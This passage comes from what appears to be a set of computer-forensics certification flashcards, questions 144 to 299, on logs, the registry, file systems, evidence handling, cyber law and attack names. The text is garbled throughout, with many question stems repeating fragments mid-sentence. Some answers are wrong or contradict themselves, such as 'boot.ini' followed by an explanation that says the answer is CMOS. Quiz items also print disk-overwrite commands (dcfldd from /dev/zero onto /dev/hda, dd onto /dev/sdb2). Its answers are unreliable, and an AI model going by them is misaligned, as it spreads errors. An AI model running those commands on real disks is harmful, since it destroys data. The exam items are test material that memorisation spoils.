device and its peripheral equipment and media

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
144
Q

If the partition size Is 4 GB, each cluster will be 32 K. Even If a file needs only 10 K, the
entire 32 K will be allocated, resulting In 22 K of___________.

A

Slack space

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
145
Q

Shortcuts are the files with the extension .Ink that are created and are accessed by the
users. These files provide you with information about:

A

Files or network shares

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
146
Q

The IIS log file format is a fixed (cannot be customized) ASCII text-based format. The IIS
format includes basic items, such as client IP address, user name, date and time, service
and instance, server name and IP address, request type, target of operation, etc. Identify
the service status code from the following IIS log.
192.168.100.150, -, 03/6/11, 8:45:30, W3SVC2, SERVER, 172.15.10.30, 4210, 125, 3524,
100, 0, GET, /dollerlogo.gif,

A

100

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
147
Q

Computer security logs contain information about the events occurring within an
organization’s systems and networks. Application and Web server log files are useful in
detecting web attacks. The source, nature, and time of the attack can be determined by
_________of the compromised system.

A

Analyzing log files

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
148
Q

T or F: The disk in the disk drive rotates at high speed, and heads in the disk drive are used only
to read data.

A

False

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
149
Q

Which of the following approaches checks and compares all the fields systematically and
intentionally for positive and negative correlation with each other to determine the
correlation across one or multiple fields?

A

Automated field correlation approach

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
150
Q

Subscriber Identity Module (SIM) is a removable component that contains essential
information about the subscriber. Its main function entails authenticating the user of the cell
phone to the network to gain access to subscribed services. SIM contains a 20-digit long
Integrated Circuit Card identification (ICCID) number, identify the issuer identifier Number
from the ICCID below.

A

2nd set of numbers listed on the card

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
151
Q

Which of the following attacks allows an attacker to access restricted directories, including
application source code, configuration and critical system files, and to execute commands
outside of the web server’s root directory?

A

Directory traversal

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
152
Q

Data acquisition system is a combination of tools or processes used to gather, analyze and
record Information about some phenomenon. Different data acquisition system are used
depends on the location, speed, cost. etc. Serial communication data acquisition system is
used when the actual location of the data is at some distance from the computer. Which of
the following communication standard is used in serial communication data acquisition
system?

A

RS232

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
153
Q

When a file or folder is deleted, the complete path, including the original file name, is stored
in a special hidden file called “INF02” in the Recycled folder. If the INF02 file is deleted, it is
re-created when you___________.

A

Restart Windows

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
154
Q

A system with a simple logging mechanism has not been given much attention during
development, this system is now being targeted by attackers, if the attacker wants to
perform a new line injection attack, what will he/she inject into the log file?

A

Plaintext

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
155
Q

You can interact with the Registry through intermediate programs. Graphical user interface
(GUI) Registry editors such as Regedit.exe or Regedt32 exe are commonly used as
intermediate programs in Windows 7. Which of the following is a root folder of the registry
editor?

A

HKEY_USERS

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
156
Q

A swap file is a space on a hard disk used as the virtual memory extension of a computer’s
RAM. Where is the hidden swap file in Windows located?

A

C:\pagefile.sys

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
157
Q

Netstat is a tool for collecting Information regarding network connections. It provides a
simple view of TCP and UDP connections, and their state and network traffic statistics.
Which of the following commands shows you the TCP and UDP network connections,
listening ports, and the identifiers?

A

netstat -ano

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
158
Q

Microsoft Security IDs are available in Windows Registry Editor. The path to locate IDs in
Windows 7 is:

A

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion \ProfileList

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
159
Q

Computer forensics report provides detailed information on complete computer forensics
investigation process. It should explain how the incident occurred, provide technical details
of the incident and should be clear to understand. Which of the following attributes of a
forensics report can render it inadmissible in a court of law?

A

It is based on logical assumptions about the incident timeline

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
160
Q

Which of the following network attacks refers to sending huge volumes of email to an
address in an attempt to overflow the mailbox, or overwhelm the server where the email
address is hosted, to cause a denial-of-service attack?

A

Mail bombing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
161
Q

T or F: Log management includes all the processes and techniques used to collect, aggregate,
and analyze computer-generated log messages. It consists of the hardware, software,
network and media used to generate, transmit, store, analyze, and dispose of log data.

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
162
Q

Which of the following is not an example of a cyber-crime?

A

Firing an employee for misconduct

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
163
Q

FAT32 is a 32-bit version of FAT file system using smaller clusters and results in efficient
storage capacity. What is the maximum drive size supported?

A

2 terabytes

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
164
Q

When the operating system marks cluster as used, but does not allocate them to any file,
such clusters are known as ___________.

A

Lost clusters

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
165
Q

T or F: Volatile information can be easily modified or lost when the system is shut down or
rebooted. It helps to determine a logical timeline of the security incident and the users who
would be responsible.

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
166
Q

Data compression involves encoding the data to take up less storage space and less
bandwidth for transmission. It helps in saving cost and high data manipulation in many
business applications.
Which data compression technique maintains data integrity?

A

Lossless compression

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
167
Q

T or F: A rogue/unauthorized access point is one that Is not authorized for operation by a particular
firm or network

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
168
Q

First response to an incident may involve three different groups of people, and each will
have differing skills and need to carry out differing tasks based on the incident. Who is
responsible for collecting, preserving, and packaging electronic evidence?

A

Forensic laboratory staff

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
169
Q

Which of the following commands shows you the names of all open shared files on a server
and number of file locks on each file?

A

Net file

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
170
Q

Identify the attack from following sequence of actions?
Step 1: A user logs in to a trusted site and creates a new session
Step 2: The trusted site stores a session identifier for the session in a cookie in the web
browser
Step 3: The user is tricked to visit a malicious site
Step 4: the malicious site sends a request from the user’s browser using his session cookie

A

Cross-Site Request Forgery (CSRF) Attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
171
Q

What is the goal of forensic science?

A

To determine the evidential value of the crime scene and related evidence

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
172
Q

Which of the following statements is incorrect related to acquiring electronic evidence at
crime scene?

A

At the time of seizing process, you need to shut down the computer immediately

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
173
Q

TCP/IP (Transmission Control Protocol/Internet Protocol) is a communication protocol used
to connect different hosts in the Internet. It contains four layers, namely the network
interface layer. Internet layer, transport layer, and application layer.
Which of the following protocols works under the transport layer of TCP/IP?

A

UDP

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
174
Q

T or F: Hash injection attack allows attackers to inject a compromised hash into a local session
and use the hash to validate network resources.

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
175
Q

Which of the following passwords are sent over the wire (and wireless) network, or stored
on some media as it is typed without any alteration?

A

Clear text passwords

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
176
Q

Quality of a raster Image is determined by the _________________and the amount of
information in each pixel.

A

Total number of pixels

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
177
Q

Wireless network discovery tools use two different methodologies to detect, monitor and
log a WLAN device (i.e. active scanning and passive scanning). Active scanning
methodology involves ____________and waiting for responses from available wireless
networks.

A

Broadcasting a probe request frame

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
178
Q

The Apache server saves diagnostic information and error messages that it encounters
while processing requests. The default path of this file is usr/local/apache/logs/error.log in
Linux. Identify the Apache error log from the following logs.

A

[Wed Oct 11 14:32:52 2000] [error] [client 127.0.0.1] client denied by server configuration: /export/home/live/ap/htdocs/test

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
179
Q

Which one of the following statements is not correct while preparing for testimony?

A

Do not determine the basic facts of the case before beginning and examining the evidence

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
180
Q

Which of the following commands shows you all of the network services running on
Windows-based servers?

A

Net start

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
181
Q

Which root folder (hive) of registry editor contains a vast array of configuration information
for the system, including hardware settings and software settings?

A

HKEY_LOCAL_MACHINE

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
182
Q

Wi-Fi Protected Access (WPA) is a data encryption method for WLANs based on 802.11
standards. Temporal Key Integrity Protocol (TKIP) enhances WEP by adding a rekeying
mechanism to provide fresh encryption and integrity keys. Temporal keys are changed for
every____________.

A

10.000 packets

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
183
Q

What is a chain of custody?

A

A legal document that demonstrates the progression of evidence as it travels from the original evidence location to the forensic laboratory

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
184
Q

Email spoofing refers to:

A

The forgery of an email header so that the message appears to have originated from someone or somewhere other than the actual source

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
185
Q

Which of the following password cracking techniques works like a dictionary attack, but
adds some numbers and symbols to the words from the dictionary and tries to crack the
password?

A

Hybrid attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
186
Q

In what circumstances would you conduct searches without a warrant?

A

When destruction of evidence is imminent, a warrantless seizure of that evidence is justified if there is probable cause to believe that the item seized constitutes evidence of criminal activity

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
187
Q

Ron. a computer forensics expert, Is Investigating a case involving corporate espionage.
He has recovered several mobile computing devices from the crime scene. One of the
evidence that Ron possesses is a mobile phone from Nokia that was left in on condition.
Ron needs to recover the IMEI number of the device to establish the identity of the device
owner. Which of the following key combinations he can use to recover the IMEI number?

A

*#06#

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
188
Q

What is cold boot (hard boot)?

A

It is the process of starting a computer from a powered-down or off state

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
189
Q

T or F: You should always work with original evidence

A

False

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
190
Q

T or F: Recovery of the deleted partition is the process by which the investigator evaluates and
extracts the deleted partitions.

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
191
Q

What advantage does the tool Evidor have over the built-in Windows search?

A

It can search slack space

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
192
Q

A picture file is recovered from a computer under investigation. During the investigation
process, the file is enlarged 500% to get a better view of its contents. The picture quality is
not degraded at all from this process. What kind of picture is this file?its contents. The
picture? quality is not degraded at all from this process. What kind of picture is this file?

A

Vector image

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
193
Q

When searching through file headers for picture file formats, what should be searched to
find a JPEG file in hexadecimal format?

A

FF D8 FF E0 00 10

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
194
Q

What method of copying should always be performed first before carrying out an
investigation?

A

Bit-stream copy

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
195
Q

Which is a standard procedure to perform during all computer forensics investigations?

A

With the hard drive removed from the suspect PC, check the date and time in the system CMOSWith the hard drive removed from the suspect PC, check the date and time in the system? CMOS

196
Q

When examining a file with a Hex Editor, what space does the file header occupy?

A

The first several bytes of the file

197
Q
Given the drive dimensions as follows and assuming a sector has 512 bytes, what is the
capacity of the described hard drive?
22,164 cylinders/disk
80 heads/cylinder
63 sectors/track
A

53.26 GB

198
Q

Which legal document allows law enforcement to search an office, place of business, or
other locale for evidence relating to an alleged crime?

A

Search warrant

199
Q

When performing a forensics analysis, what device is used to prevent the system from
recording data on an evidence disk?

A

Write-blocker

200
Q

A small law firm located in the Midwest has possibly been breached by a computer hacker
looking to obtain information on their clientele. The law firm does not have any on-site IT
employees, but wants to search for evidence of the breach themselves to prevent any
possible media attention. Why would this not be recommended?

A

Searching can change date/time stamps

201
Q

Where is the default location for Apache access logs on a Linux computer?

A

usr/local/apache/logs/access_log

202
Q

If a PDA is seized in an investigation while the device is turned on, what would be the
proper procedure?

A

Keep the device powered on

203
Q

Preparing an image drive to copy files to is the first step in Linux forensics. For this
purpose, what would the following command accomplish? dcfldd if=/dev/zero of=/dev/hda
bs=4096 conv=noerror, sync

A

Fill the disk with zeros

204
Q

What hashing method is used to password protect Blackberry devices?

A

SHA-1

205
Q

What type of attack sends SYN requests to a target system with spoofed IP addresses?

A

SYN flood

206
Q

George was recently fired from his job as an IT analyst at Pitts and Company in Dallas
Texas. His main duties as an analyst were to support the company Active Directory
structure and to create network polices. George now wants to break into the company
network by cracking some ofcompany? Active Directory structure and to create network
polices. George now wants to break into the company? network by cracking some of the
service accounts he knows about. Which password cracking technique should George use
in this situation?

A

Rule-based attack

207
Q

What must be obtained before an investigation is carried out at a location?

A

Search warrant

208
Q

An on-site incident response team is called to investigate an alleged case of computer
tampering within their company. Before proceeding with the investigation, the CEO informs
them that the incident will be classified as ow level? How long will the team have to
respond to the incident?the investigation, the CEO informs them that the incident will be
classified as ?ow level? How long will the team have to respond to the incident?

A

One working day

209
Q

During an investigation, an employee was found to have deleted harassing emails that
were sent to someone else. The company was using Microsoft Exchange and had
message tracking enabled. Where could the investigator search to find the message
tracking log file on the Exchange server?

A

C:\Program Files\Exchsrvr\servername.log

210
Q

What layer of the OSI model do TCP and UDP utilize?

A

Transport

211
Q

What technique is used by JPEGs for compression?

A

DCT

212
Q

A forensics investigator is searching the hard drive of a computer for files that were recently
moved to the Recycle Bin. He searches for files in C:\RECYCLED using a command line
tool but does not find anything. What is the reason for this?

A

The files are hidden and he must use switch to view themThe files are hidden and he must use ? switch to view them

213
Q

What is one method of bypassing a system BIOS password?

A

Removing the CMOS battery

214
Q

In conducting a computer abuse investigation you become aware that the suspect of the
investigation is using ABC Company as his Internet Service Provider (ISP). You contact the
ISP and request that they provide you assistance with your investigation. What assistance
can the ISP provide?

A

The ISP can investigate computer abuse committed by their employees, but must preserve the privacy of their customers and therefore cannot assist you without a warrant

215
Q

What file is processed at the end of a Windows XP boot to initialize the logon dialog box?

A

LSASS.EXE

216
Q

When should an MD5 hash check be performed when processing evidence?

A

Before and after evidence examination

217
Q

How often must a company keep log files for them to be admissible in a court of law?

A

Continuously

218
Q

You are working in the Security Department of a law firm. One of the attorneys asks you
about the topic of sending fake email because he has a client who has been charged with
doing just that. His client alleges that he is innocent and that there is no way for a fake
email to actually be sent. You inform the attorney that his client is mistaken and that fake
email is a possibility and that you can prove it. You return to your desk and craft a fake
email to the attorney that appears to come from his boss. What port do you send the email
to on the company SMTP server?fake email to the attorney that appears to come from his
boss. What port do you send the email to on the company? SMTP server?

A

25

219
Q

Under confession, an accused criminal admitted to encrypting child pornography pictures
and then hiding them within other pictures. What technique did the accused criminal
employ?

A

Steganography

220
Q

What happens when a file is deleted by a Microsoft operating system using the FAT file
system?

A

Only the reference to the file is removed from the FAT and can be recovered

221
Q

When investigating a network that uses DHCP to assign IP addresses, where would you
look to determine which system (MAC address) had a specific IP address at a specific
time?

A

In the DHCP Server log files

222
Q

When using an iPod and the host computer is running Windows, what file system will be
used?

A

FAT32

223
Q

What is the slave device connected to the secondary IDE controller on a Linux OS referred
to?

A

hdd

224
Q

When making the preliminary investigations in a sexual harassment case, how many
investigators are you recommended having?

A

Two

225
Q

If you are concerned about a high level of compression but not concerned about any
possible data loss, what type of compression would you use?

A

Lossy compression

226
Q

Davidson Trucking is a small transportation company that has three local offices in Detroit
Michigan. Ten female employees that work for the company have gone to an attorney
reporting that male employees repeatedly harassed them and that management did
nothing to stop the problem. Davidson has employee policies that outline all company
guidelines, including awareness on harassment and how it will not be tolerated. When the
case is brought to court, whom should the prosecuting attorney call upon for not upholding
company policy?

A

Supervisors

227
Q

Why should you never power on a computer that you need to acquire digital evidence
from?

A

When the computer boots up, files are written to the computer rendering the data nclean?When the computer boots up, files are written to the computer rendering the data ?nclean

228
Q

What will the following command accomplish?

dd if=/dev/xxx of=mbr.backup bs=512 count=1

A

Back up the master boot record

229
Q

Paraben Lockdown device uses which operating system to write hard drive data?Paraben?
Lockdown device uses which operating system to write hard drive data?

A

Windows

230
Q

To check for POP3 traffic using Ethereal, what port should an investigator search by?

A

110

231
Q

When needing to search for a website that is no longer present on the Internet today but
was online few years back, what site can be used to view the website collection of
pages?view the website? collection of pages?

A

Archive.org

232
Q

An investigator is searching through the firewall logs of a company and notices ICMP
packets that are larger than 65,536 bytes. What type of activity is the investigator seeing?

A

Ping of death

233
Q

Travis, a computer forensics investigator, is finishing up a case he has been working on for
over a month involving copyright infringement and embezzlement. His last task is to
prepare an investigative report for the president of the company he has been working for.
Travis must submit a hard copy and an electronic copy to this president. In what electronic
format should Travis send this report?

A

PDF

234
Q

What technique used by Encase makes it virtually impossible to tamper with evidence once
it has been acquired?

A

Every byte of the file(s) is verified using 32-bit CRC

235
Q

What feature of Decryption Collection allows an investigator to crack a password as quickly
as possible?

A

Distribute processing over 16 or fewer computers

236
Q

How many times can data be written to a DVD+R disk?

A

Once

237
Q

An employee is attempting to wipe out data stored on a couple of compact discs (CDs) and
digital video discs (DVDs) by using a large magnet. You inform him that this method will not
be effective in wiping out the data because CDs and DVDs are _________ media used to
store large amounts of data and are not affected by the magnet.

A

Optical

238
Q

Jacob is a computer forensics investigator with over 10 years experience in investigations
and has written over 50 articles on computer forensics. He has been called upon as a
qualified witness to testify the accuracy and integrity of the technical log files gathered in an
investigation into computer fraud. What is the term used for Jacob testimony in this
case?computer fraud. What is the term used for Jacob? testimony in this case?

A

Authentication

239
Q

You have been asked to investigate the possibility of computer fraud in the finance
department of a company. It is suspected that a staff member has been committing finance
fraud by printing cheques that have not been authorized. You have exhaustively searched
all data files on a bitmap image of the target computer, but have found no evidence. You
suspect the files may not have been saved. What should you examine next in this case?

A

The swapfile

240
Q

The efforts to obtain information before a trial by demanding documents, depositions,
questions and answers written under oath, written requests for admissions of fact, and
examination of the scene is a description of what legal term?

A

Discovery

241
Q

What must an investigator do before disconnecting an iPod from any type of computer?

A

Unmount the iPod

242
Q

In the context of file deletion process, which of the following statement holds true?

A

While booting, the machine may create temporary files that can delete evidence

243
Q

With regard to using an antivirus scanner during a computer forensics investigation, you
should:

A

Scan your forensics workstation before beginning an investigation

244
Q

John is working as a computer forensics investigator for a consulting firm in Canada. He is
called to seize a computer at a local web caf?John is working as a computer forensics
investigator for a consulting firm in Canada. He is called to seize a computer at a local web
caf purportedly used as a botnet server. John thoroughly scans the computer and finds
nothing that would lead him to think the computer was a botnet server. John decides to
scan the virtual memory of the computer to possibly find something he had missed. What
information will the virtual memory scan produce?

A

Hidden running processes

245
Q

What does the acronym POST mean as it relates to a PC?

A

Power On Self Test

246
Q

Paul is a computer forensics investigator working for Tyler & Company Consultants. Paul
has been called upon to help investigate a computer hacking ring broken up by the local
police. Paul begins to inventory the PCs found in the hackers?hideout. Paul then comes
across a PDA left by them that is attached to a number of different peripheral devices.
What is the first step that Paul must take with the PDA to ensure the integrity of the
investigation?

A

Photograph and document the peripheral devices

247
Q

What term is used to describe a cryptographic technique for embedding information into
something else for the sole purpose of hiding that information from the casual observer?

A

Steganography

248
Q

You are called by an author who is writing a book and he wants to know how long the
copyright for his book will last after he has the book published?

A

The life of the author plus 70 years

249
Q

You are called in to assist the police in an investigation involving a suspected drug dealer.
The police searched the suspect house after aYou are called in to assist the police in an
investigation involving a suspected drug dealer. The police searched the suspect? house
after a warrant was obtained and they located a floppy disk in the suspect bedroom. The
disk contains several files, but they appear to be passwordwarrant was obtained and they
located a floppy disk in the suspect? bedroom. The disk contains several files, but they
appear to be password protected. What are two common methods used by password
cracking software that you could use to obtain the password?

A

Brute force and dictionary attack

250
Q

To preserve digital evidence, an investigator should ____________

A

Make two copies of each evidence item using different imaging tools

251
Q

When carrying out a forensics investigation, why should you never delete a partition on a
dynamic disk?

A

This action can corrupt the disk

252
Q

Heather, a computer forensics investigator, is assisting a group of investigators working on
a large computer fraud case involving over 20 people. These 20 people, working in
different offices, allegedly siphoned off money from many different client accounts. Heather
responsibility is to findThese 20 people, working in different offices, allegedly siphoned off
money from many different client accounts. Heather? responsibility is to find out how the
accused people communicated between each other. She has searched their email and
their computers and has not found any useful evidence. Heather then finds some possibly
useful evidence under the desk of one of the accused. In an envelope she finds a piece of
plastic with numerous holes cut out of it. Heather then finds the same exact piece of plastic
with holes at many of the other accused peoples?desks. Heather believes that the 20
people involved in the case were using a cipher to send secret messages in between each
other. What type of cipher was used by the accused in this case?

A

Grill cipher

253
Q

What type of file is represented by a colon (:) with a name following it in the Master File
Table (MFT) of an NTFS disk?

A

Data stream file

254
Q

Daryl, a computer forensics investigator, has just arrived at the house of an alleged
computer hacker. Daryl takes pictures and tags all computer and peripheral equipment
found in the house. Daryl packs all the items found in his van and takes them back to his
lab for further examination. At his lab, Michael his assistant helps him with the
investigation. Since Michael is still in training, Daryl supervises all of his work very carefully.
Michael is not quite sure about the procedures to copy all the data off the computer and
peripheral devices. How many data acquisition tools should Michael use when creating
copies of the evidence for the investigation?

A

Two

255
Q

John is working on his company policies and guidelines. The section he is currently
working on covers company documents; how they shouldJohn is working on his company?
policies and guidelines. The section he is currently working on covers company documents;
how they should be handled, stored, and eventually destroyed. John is concerned about
the process whereby outdated documents are destroyed. What type of shredder should
John write in the guidelines to be used when destroying documents?

A

Cross-cut shredder

256
Q

Where does Encase search to recover NTFS files and folders?

A

MFT

257
Q

What is the smallest physical storage unit on a hard drive?

A

Sector

258
Q

What type of equipment would a forensics investigator store in a StrongHold bag?

A

Wireless cards

259
Q

When marking evidence that has been collected with the aa/ddmmyy/nnnn/zz?format, what
does the nnn?denote?When marking evidence that has been collected with the
?aa/ddmmyy/nnnn/zz?format, what does the ?nnn?denote?

A

The sequential number of the exhibits seized

260
Q

Harold is a computer forensics investigator working for a consulting firm out of Atlanta
Georgia. Harold is called upon to help with a corporate espionage case in Miami Florida.
Harold assists in the investigation by pulling all the data from the computers allegedly used
in the illegal activities. He finds that two suspects in the company where stealing sensitive
corporate information and selling it to competing companies. From the email and instant
messenger logs recovered, Harold has discovered that the two employees notified the
buyers by writing symbols on the back of specific stop signs. This way, the buyers knew
when and where to meet with the alleged suspects to buy the stolen material. What type of
steganography did these two suspects use?

A

Visual semagram

261
Q

At what layer does a cross site scripting attack occur on?

A

Application

262
Q

The offset in a hexadecimal code is:

A

The 0x at the beginning of the code

263
Q

When obtaining a warrant it is important to:

A

particularly describe the place to be searched and particularly describe the items to be seized

264
Q

If an attacker’s computer sends an IPID of 31400 to a zombie computer on an open port in
IDLE scanning, what will be the response?

A

31401

265
Q

Under which Federal Statutes does FBI investigate for computer crimes involving e-
mail scams and mail fraud?

A

18 U.S.C. 1030 Fraud and related activity in connection with computers

266
Q

Windows identifies which application to open a file with by examining which of the
following?

A

The File extension

267
Q

When conducting computer forensic analysis, you must guard against
______________ So that you remain focused on the primary job and insure that the
level of work does not increase beyond what was originally expected.

A

Scope Creep

268
Q

In a virtual test environment, Michael is testing the strength and security of BGP using
multiple routers to mimic the backbone of the Internet. This project will help him write his
doctoral thesis on “bringing down the Internet”. Without sniffing the traffic between the
routers, Michael sends millions of RESET packets to the routers in an attempt to shut one
or all of them down. After a few hours, one of the routers finally shuts itself down. What will
the other routers communicate between themselves?

A

The change in the routing fabric to bypass the affected router

269
Q

Jason is the security administrator of ACMA metal Corporation. One day he notices
the company’s Oracle database server has been compromised and the customer
information along with financial data has been stolen. The financial loss will be in
millions of dollars if the database gets into the hands of the competitors. Jason
wants to report this crime to the law enforcement agencies immediately. Which
organization coordinates computer crimes investigations throughout the United
States?

A

Local or national office of the U.S. Secret Service

270
Q

This organization maintains a database of hash signatures for known software

A

National Software Reference Library

271
Q

Where are files temporarily written in Unix when printing?

A

/var/spool

272
Q

When is it appropriate to use computer forensics?

A

If copyright and intellectual property theft/misuse has occurred

273
Q

While searching through a computer under investigation, you discover numerous files that
appear to have had the first letter of the file name replaced by the hex code byte 5h.?What
does this indicate on the computer?replaced by the hex code byte ?5h.?What does this
indicate on the computer?

A

The files have been marked for deletion

274
Q

A state department site was recently attacked and all the servers had their disks
erased. The incident response team sealed the area and commenced investigation.
During evidence collection they came across a zip disks that did not have the
standard labeling on it. The incident team ran the disk on an isolated system and
found that the system disk was accidentally erased. They decided to call in the FBI
for further investigation. Meanwhile, they short listed possible suspects including
three summer interns. Where did the incident team go wrong?

A

They tampered with evidence by using it

275
Q

A suspect is accused of violating the acceptable use of computing resources, as he has
visited adult websites and downloaded images. The investigator wants to demonstrate that
the suspect did indeed visit these sites. However, the suspect has cleared the search
history and emptied the cookie cache. Moreover, he has removed any images he might
have downloaded. What can the investigator do to prove the violation? Choose the most
feasible option.

A

Image the disk and try to recover deleted files

276
Q

If you plan to startup a suspects computer, you must modify the ___________ to
ensure that you do not contaminate or alter data on the suspects hard drive by
booting to the hard drive.

A

boot.ini
Explanation: The OS isnt specified, but if this was a Windows OS, then this would be boot.ini The answer is CMOS. The startup of a computer is the boot sequence, and the boot sequence is defined in the CMOS. The common occurrence is to boot off a floppy, and you need to see that the floppy (usually the A drive) is first in the sequence. If you dont, and the hard drive is first, then booting the system wil boot the hard drive and alter the evidence.

277
Q

Meyer Electronics Systems just recently had a number of laptops stolen out of their office.
On these laptops contained sensitive corporate information regarding patents and company
strategies. A month after the laptops were stolen, a competing company was found to have
just developed products that almost exactly duplicated products that Meyer produces. What
could have prevented this information from being stolen from the laptops?

A

EFS Encryption

278
Q

While presenting his case to the court, Simon calls many witnesses to the stand to testify.
Simon decides to call Hillary Taft, a lay witness, to the stand. Since Hillary is a lay witness,
what field would she be considered an expert in?

A

No particular field

279
Q

When investigating a wireless attack, what information can be obtained from the DHCP
logs?

A

MAC address of the attacker If any computers on the network are running in promiscuous mode

280
Q

Your company’s network just finished going through a SAS 70 audit. This audit reported
that overall, your network is secure, but there are some areas that needs improvement.
The major area was SNMP security. The audit company recommended turning off SNMP,
but that is not an option since you have so many remote nodes to keep track of. What step
could you take to help secure SNMP on your network?

A

Change the default community string names

281
Q

What header field in the TCP/IP protocol stack involves the hacker exploit known as
the Ping of Death?

A

ICMP header field

Explanation: The Ping of Death occurs when the ICMP Header field contains a packet size lager than 65507 bytes.

282
Q

You are a security analyst performing reconnaissance on a company you will be carrying
out a penetration test for. You conduct a search for IT jobs on Dice.com and find the
following information for an open position: 7+ years experience in Windows Server
environment 5+ years experience in Exchange 2000/2003 environment Experience with
Cisco Pix Firewall, Linksys 1376 router, Oracle 11i and MYOB v3.4 Accounting software
are reQuired MCSA desired, MCSE, CEH preferred No Unix/Linux Experience needed
What is this information posted on the job website considered?

A

Information vulnerability

283
Q

E-mail logs contain which of the following information to help you in your
investigation?

A

user account that was used to send the account
unique message identifier
contents of the e-mail message
date and time the message was sent

284
Q

Using Linux to carry out a forensics investigation, what would the following command
accomplish? dd if=/usr/home/partition.image of=/dev/sdb2 bs=4096 conv=notrunc,noerror

A

Restore a disk from an image file

285
Q

You are working as a computer forensics investigator for a corporation on a computer
abuse case. You discover evidence that shows the subject of your investigation is also
embezzling money from the company. The company CEO and the corporate legal counsel
advise you to contact local law enforcement and provide them with the evidence that you
have found. The law enforcement officer that responds requests that you put a network
sniffer on your network and monitor all traffic to the subject computer. You inform the officer
that you will not be able to comply with thatnetwork sniffer on your network and monitor all
traffic to the subject? computer. You inform the officer that you will not be able to comply
with that request because doing so would:

A

Make you an agent of law enforcement

286
Q

Why would you need to find out the gateway of a device when investigating a wireless
attack?

A

The gateway will be the IP used to manage the access point

287
Q

How many possible sequence number combinations are there in TCP/IP protocol?

A

4 billion

288
Q

Cylie is investigating a network breach at a state organization in Florida. She discovers that
the intruders were able to gain access into the company firewalls by overloading them with
IP packets. Cylie then discovers through her investigation that the intruders hacked into
thecompany? firewalls by overloading them with IP packets. Cylie then discovers through
her investigation that the intruders hacked into the company phone system and used the
hard drives on their PBX system to store shared music files. What would this attack on the
companycompany? phone system and used the hard drives on their PBX system to store
shared music files. What would this attack on the company? PBX system be called?

A

Phreaking

289
Q

The newer Macintosh Operating System (MacOS X) is based on:

A

BSD Unix

290
Q

You are working as Computer Forensics investigator and are called by the owner of
an accounting firm to investigate possible computer abuse by one of the firms
employees. You meet with the owner of the firm and discover that the company has
never published a policy stating that they reserve the right to inspect their
computing assets at will. What do you do?

A

Inform the owner that conducting an investigation without a policy is a violation of the employees expectation of privacy

291
Q

What stage of the incident handling process involves reporting events?

A

Identification

292
Q

What does the superblock in Linux define?

A

location of the first inode

293
Q

Steven has been given the task of designing a computer forensics lab for the company he
works for. He has found documentation on all aspects of how to design a lab except the
number of exits needed. How many exits should Steven include in his design for the
computer forensics lab?

A

One

294
Q

Why is it still possible to recover files that have been emptied from the Recycle Bin on a
Windows computer?

A

The data is still present until the original location of the file is used

295
Q

Madison is on trial for allegedly breaking into her university internal network. The police
raided her dorm room and seized all of her computerMadison is on trial for allegedly
breaking into her university? internal network. The police raided her dorm room and seized
all of her computer equipment. Madison lawyer is trying to convince the judge that the
seizure was unfounded and baseless. Under which US Amendment isequipment.
Madison? lawyer is trying to convince the judge that the seizure was unfounded and
baseless. Under which US Amendment is Madison lawyer trying to prove the police
violated?Madison? lawyer trying to prove the police violated?

A

The 4th Amendment

296
Q

What operating system would respond to the following command? C:> nmap -sW
10.10.145.65

A

FreeBSD

297
Q

In handling computer-related incidents, which IT role should be responsible for recovery,
containment, and prevention to constituents?

A

Network Administrator

298
Q

Your company uses Cisco routers exclusively throughout the network. After securing the
routers to the best of your knowledge, an outside security firm is brought in to assess the
network security. Although they found very few issues, they were able to enumerate the
model, OS version, and capabilities for all your Cisco routers with very little effort. Which
feature will you disable to eliminate the ability to enumerate this information on your Cisco
routers?

A

Cisco Discovery Protocol

299
Q

What is considered a grant of a property right given to an individual who discovers or
